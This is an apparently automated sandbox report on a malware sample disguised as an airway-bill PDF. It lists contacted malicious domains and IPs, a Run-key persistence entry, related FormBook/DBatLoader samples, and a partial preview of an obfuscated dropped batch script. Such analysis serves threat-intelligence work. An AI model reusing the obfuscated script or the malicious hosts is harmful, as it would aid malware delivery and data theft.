0000000C.00000003.2404075127.00000000006C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.0000000021741000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.000000002179E000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.00000000006C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://ocsp.sectigo.com0Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.0000000021741000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.000000002179E000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.00000000006C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://marposet.shop/firefox.exe, 00000017.00000002.3085974166.0000000019B08000.00000004.80000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.0000000021741000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.000000002179E000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.00000000006C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=proquota.exe, 00000012.00000002.3374453321.00000000076A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://drive.usercontent.google.com/Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2170331076.0000000000787000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=proquota.exe, 00000012.00000002.3374453321.00000000076A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.0000000021741000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.000000002179E000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.00000000006C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.ecosia.org/newtab/proquota.exe, 00000012.00000002.3374453321.00000000076A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://missvet.net/htux/?yt=LNd8mbFxBhGLQV&TB1lE=Q5GQh2pDxKbycOBSxf5jPMYccS9RI9gVCLS1zMNZ/AR9Q5msL9Gproquota.exe, 00000012.00000002.3372194719.00000000055CC000.00000004.10000000.00040000.00000000.sdmp, WQzLddwiZR.exe, 00000015.00000002.3371539991.000000000319C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://ac.ecosia.org/autocomplete?q=proquota.exe, 00000012.00000002.3374453321.00000000076A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.missvet.netWQzLddwiZR.exe, 00000015.00000002.3370132243.000000000096B000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://drive.google.com/Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2170331076.000000000071B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchproquota.exe, 00000012.00000002.3374453321.00000000076A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=proquota.exe, 00000012.00000002.3374453321.00000000076A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://ocsp.sectigo.com0CAirway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.0000000021741000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.000000002179E000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.00000000006C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.pmail.com0Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2168688246.000000007EC8A000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2228426498.0000000021F8B000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.00000000208A0000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2168238016.0000000021EE1000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000002.2522133724.00000000208A6000.00000004.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.3369025968.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.3372194719.0000000004B9C000.00000004.10000000.00040000.00000000.sdmp, WQzLddwiZR.exe, 00000015.00000000.2753377461.000000000276C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3085974166.00000000193FC000.00000004.80000000.00040000.00000000.sdmp, hdcleziT.pif.0.drfalse
                                                                            		high

                                                                            World Map of Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public IPs

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            108.179.193.23
                                                                            		missvet.netUnited States
                                                                            		46606UNIFIEDLAYER-AS-1UStrue
                                                                            188.114.97.3
                                                                            		www.marposet.shopEuropean Union
                                                                            		13335CLOUDFLARENETUStrue
                                                                            142.250.186.174
                                                                            		drive.google.comUnited States
                                                                            		15169GOOGLEUSfalse
                                                                            52.223.13.41
                                                                            		www.techforcreators.liveUnited States
                                                                            		8987AMAZONEXPANSIONGBtrue
                                                                            172.217.16.193
                                                                            		drive.usercontent.google.comUnited States
                                                                            		15169GOOGLEUSfalse

                                                                            General Information

                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1582317
                                                                            Start date and time:2024-12-30 10:56:09 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 9m 29s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:21
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:3
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.evad.winEXE@27/8@9/5
                                                                            EGA Information:
                                                                            • Successful, ratio: 100%
                                                                            HCA Information:
                                                                            • Successful, ratio: 98%
                                                                            • Number of executed functions: 77
                                                                            • Number of non-executed functions: 261
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe

                                                                            Warnings

                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                            • Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
                                                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            04:57:01API Interceptor2x Sleep call for process: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe modified
                                                                            04:57:21API Interceptor4x Sleep call for process: Tizelcdh.PIF modified
                                                                            04:58:35API Interceptor159637x Sleep call for process: proquota.exe modified
                                                                            10:57:13AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Tizelcdh C:\Users\Public\Tizelcdh.url
                                                                            10:57:21AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Tizelcdh C:\Users\Public\Tizelcdh.url

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            108.179.193.23appdrivesound.exeGet hashmaliciousSystemBCBrowse
                                                                              188.114.97.3RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                              • www.rgenerousrs.store/o362/
                                                                              A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                              • www.beylikduzu616161.xyz/2nga/
                                                                              Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                                                              • radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
                                                                              ce.vbsGet hashmaliciousUnknownBrowse
                                                                              • paste.ee/d/lxvbq
                                                                              Label_00000852555.doc.jsGet hashmaliciousUnknownBrowse
                                                                              • tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
                                                                              PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                                              • www.ssrnoremt-rise.sbs/3jsc/
                                                                              QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • filetransfer.io/data-package/zWkbOqX7/download
                                                                              http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                              • kklk16.bsyo45ksda.top/favicon.ico
                                                                              gusetup.exeGet hashmaliciousUnknownBrowse
                                                                              • www.glarysoft.com/update/glary-utilities/pro/pro50/
                                                                              Online Interview Scheduling Form.lnkGet hashmaliciousDucktailBrowse
                                                                              • gmtagency.online/api/check
                                                                              52.223.13.41rQuotation.exeGet hashmaliciousFormBookBrowse
                                                                              • www.seamarket.shop/zsuo/?4v7=YAgg/ldayhOHmzfsjWLXvaG7J5REZu11MAD7iHXRrkYiTwNIRlKLNa8zNDpduzX56xW5NVkmDFlOQcyvict8ZBdH6DXl406L+zQHeArrLeiD5GII5G18dkg=&pRel=chN0
                                                                              z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                                              • www.panavet.net/t927/
                                                                              PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                                              • www.guilda.pro/1w6c/
                                                                              http://gameshdlive.netGet hashmaliciousUnknownBrowse
                                                                              • gameshdlive.net/lander
                                                                              rpedido-002297.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • www.diterra.shop/i214/
                                                                              ORIGINAL INVOICE COAU7230734298.pdf.exeGet hashmaliciousFormBookBrowse
                                                                              • www.resellnexa.shop/sfpe/
                                                                              z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                                                              • www.longfilsalphonse.net/iq05/
                                                                              PO23100072.exeGet hashmaliciousFormBookBrowse
                                                                              • www.timetime.store/hvm1/
                                                                              RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                                                              • www.insicilia.today/2fpq/
                                                                              PO-000001488.exeGet hashmaliciousFormBookBrowse
                                                                              • www.longfilsalphonse.net/8q1d/

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              www.techforcreators.liverQuotation.exeGet hashmaliciousFormBookBrowse
                                                                              • 52.223.13.41

                                                                              ASNs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              CLOUDFLARENETUS6QLvb9i.exeGet hashmaliciousLummaCBrowse
                                                                              • 188.114.97.3
                                                                              http://i646972656374o6c6373o636f6dz.oszar.com/Get hashmaliciousUnknownBrowse
                                                                              • 104.16.79.73
                                                                              securedoc_20241220T111852.htmlGet hashmaliciousUnknownBrowse
                                                                              • 104.17.25.14
                                                                              https://visa-pwr.com/Get hashmaliciousUnknownBrowse
                                                                              • 104.18.28.104
                                                                              lumma.ps1Get hashmaliciousLummaCBrowse
                                                                              • 104.21.72.190
                                                                              vlid_acid.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 172.67.190.223
                                                                              sysmonconfig.xmlGet hashmaliciousUnknownBrowse
                                                                              • 172.64.41.3
                                                                              https://N0.kolivane.ru/da4scmQ/#Memily.gamble@amd.comGet hashmaliciousUnknownBrowse
                                                                              • 172.67.134.110
                                                                              https://smex-ctp.trendmicro.com/wis/clicktime/v1/query?url=https%3a%2f%2fshm.to%2fpolice&umid=0d23e2e5-f76c-4734-8c53-52692e5df704&auth=771bc9afedacaf21ff6267a075d4e92f38a56cd1-76eb9d39a6a3c5ec361f1d32692c8a467e476d6aGet hashmaliciousUnknownBrowse
                                                                              • 104.18.1.101
                                                                              AMAZONEXPANSIONGBT1#U52a9#U624b1.0.1.exeGet hashmaliciousUnknownBrowse
                                                                              • 52.223.40.198
                                                                              telnet.sh4.elfGet hashmaliciousUnknownBrowse
                                                                              • 52.223.138.114
                                                                              armv7l.elfGet hashmaliciousUnknownBrowse
                                                                              • 96.127.3.82
                                                                              jklspc.elfGet hashmaliciousUnknownBrowse
                                                                              • 3.47.75.42
                                                                              nabarm.elfGet hashmaliciousUnknownBrowse
                                                                              • 3.37.62.206
                                                                              https://qulatrics.com/Get hashmaliciousUnknownBrowse
                                                                              • 3.33.148.61
                                                                              https://qulatrics.com/Get hashmaliciousUnknownBrowse
                                                                              • 3.33.148.61
                                                                              rQuotation.exeGet hashmaliciousFormBookBrowse
                                                                              • 52.223.13.41
                                                                              x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                              • 3.54.36.218
                                                                              nshkarm7.elfGet hashmaliciousMiraiBrowse
                                                                              • 3.47.75.28
                                                                              UNIFIEDLAYER-AS-1USbotx.sh4.elfGet hashmaliciousMiraiBrowse
                                                                              • 173.254.41.71
                                                                              botx.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                              • 50.87.246.4
                                                                              loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                              • 162.241.240.41
                                                                              https://its.piquedigital.com.br/maryland.gov/&adfs/ls/client-request-id=7c724&wa=wsignin10.htmlGet hashmaliciousUnknownBrowse
                                                                              • 108.179.253.82
                                                                              http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=hGet hashmaliciousHTMLPhisherBrowse
                                                                              • 162.241.149.91
                                                                              http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=hGet hashmaliciousHTMLPhisherBrowse
                                                                              • 162.241.149.91
                                                                              987656789009800.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 162.241.62.63
                                                                              xd.sh4.elfGet hashmaliciousMiraiBrowse
                                                                              • 142.5.37.64
                                                                              armv4l.elfGet hashmaliciousMiraiBrowse
                                                                              • 74.91.145.200
                                                                              https://u48635528.ct.sendgrid.net/ls/click?upn=u001.9c3qucD-2BQzNTT0bmLRTJr37m0fhz0zdKJtvEO5GYL-2FheRuyVOh-2FQG4V3oBgBPYNynDxn_I1ksFJapfNmw0nKrksu71KTxdlg2CVrjzBUVofCtIEhaWkhL1Pph-2Ffg-2BCFbPvkCL9SX-2Fn-2BNBrku3RcjHS1atB8ladrmemt-2BtQU5680xhgoUl-2FmS0Bdj-2FOfednny-2F-2Bj2bwjjubeRvrpN0J7TGLD3CnNRzymiQOzypjCqxHhzmXtY2EWHJMJBxjl-2FHlyEIekWjEdTpTsRC8R5LaI-2BXF4kV8UeUtXxyFJLbYiR3fqcWt2evvBBECu9MeQj8TLZrmfuTf-2BJQraijp8-2BcIdxf8rnVxjHoJK1lo9-2Bkao444JbRSinVA-2FoUxeuAtdlrITU1Z6gHAn7DLZstY4XJkhkT16-2F2TN4CFt2LQ-2BEh9GWg4EPlocPi8ljTs-2B9D9RVbWdc3s2Vk2VPHSj20oCO3-2FalihBzGJuaYie5tnYaz6wBF3EqNzMXmVqRnMZwSYuGRwSMVhkchytYzt3hUH-2F51IUfn7nuhHUcUbdS8nBYneAMuB2eSDRn8IZzUkExLUascCVn8T9ImEyo0qhVsBPdJjfT9L3qli9clY1N-2BhQXDZgQnsN1Bs9PujeLzem37C62BvWnqPnqvXh5vbcvseiZwTP35DEJysw-3D-3D#mlyon@wc.comGet hashmaliciousHTMLPhisherBrowse
                                                                              • 192.185.77.74

                                                                              JA3 Fingerprints

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              a0e9f5d64349fb13191bc781f81f42e1universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                              • 142.250.186.174
                                                                              • 172.217.16.193
                                                                              6QLvb9i.exeGet hashmaliciousLummaCBrowse
                                                                              • 142.250.186.174
                                                                              • 172.217.16.193
                                                                              lumma.ps1Get hashmaliciousLummaCBrowse
                                                                              • 142.250.186.174
                                                                              • 172.217.16.193
                                                                              vlid_acid.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 142.250.186.174
                                                                              • 172.217.16.193
                                                                              AquaPac.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 142.250.186.174
                                                                              • 172.217.16.193
                                                                              R3nz_Loader.exeGet hashmaliciousLummaCBrowse
                                                                              • 142.250.186.174
                                                                              • 172.217.16.193
                                                                              Loader.exeGet hashmaliciousLummaCBrowse
                                                                              • 142.250.186.174
                                                                              • 172.217.16.193
                                                                              BasesRow.exeGet hashmaliciousLummaCBrowse
                                                                              • 142.250.186.174
                                                                              • 172.217.16.193
                                                                              installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                              • 142.250.186.174
                                                                              • 172.217.16.193

                                                                              Dropped Files

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              C:\Users\Public\Libraries\hdcleziT.pifDelivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                  Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                    F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                      D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                        qDKTsL1y44.exeGet hashmaliciousDBatLoaderBrowse
                                                                                          PRODUCT.batGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                                                            purchaseorder.batGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                                                              PO11550.exeGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                                                                SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeGet hashmaliciousAgentTesla, DBatLoader, RedLineBrowse

                                                                                                  Created / dropped Files

                                                                                                  C:\Users\Public\Libraries\FX.cmd

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                                                                                                  File Type:DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):8556
                                                                                                  Entropy (8bit):4.623706637784657
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:dSSQx41VVrTlS2owuuWTtkY16Wdhdsu0mYKDCIfYaYuX1fcDuy:Vrhgwuua5vdnQaCIVJF6uy
                                                                                                  MD5:60CD0BE570DECD49E4798554639A05AE
                                                                                                  SHA1:BD7BED69D9AB9A20B5263D74921C453F38477BCB
                                                                                                  SHA-256:CA6A6C849496453990BECEEF8C192D90908C0C615FA0A1D01BCD464BAD6966A5
                                                                                                  SHA-512:AB3DBDB4ED95A0CB4072B23DD241149F48ECFF8A69F16D81648E825D9D81A55954E5DD9BC46D3D7408421DF30C901B9AD1385D1E70793FA8D715C86C9E800C57
                                                                                                  Malicious:true
                                                                                                  Preview:@echo off..set "MJtc=Iet "..@%.r.......%e%...%c%...r....%h%.....%o%........% % .....%o%...%f%.o.%f%......%..s%.......%e%.%t%.. .....% %.rr.. .%"%...%w%......%o%...o..%t%r.....%c%....%=%... . .%s%...... %e%....%t%....% %........ %"% o...%..%wotc%"%.%n% r .%O%...%P%.. ..%t%.%=%...... o..%=%......%"%....r...%..%wotc%"aeeYdDdanR%nOPt%s://"..%wotc%"%..........%a%.%e%......%e%.r..%Y%..%d%.....r....%D%.. %d% ... .%a%.. ...%n%.. ..%R%........%%nOPt%s%...... .%:%.. %/%....%/%r......%"%.....r.%..%wotc%"%...... ...%U%.o..%g%.r.%

                                                                                                  C:\Users\Public\Libraries\NEO.cmd

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                                                                                                  File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (420), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):46543
                                                                                                  Entropy (8bit):4.705001079878445
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:Ud6T6yIssKMyD/LgZ0+9Z2noufIBUEADZQp2H8ZLq:UdQFIssKMyjL4X2T8UbZT
                                                                                                  MD5:637A66953F03B084808934ED7DF7192F
                                                                                                  SHA1:D3AE40DFF4894972A141A631900BD3BB8C441696
                                                                                                  SHA-256:41E1F89A5F96F94C2C021FBC08EA1A10EA30DAEA62492F46A7F763385F95EC20
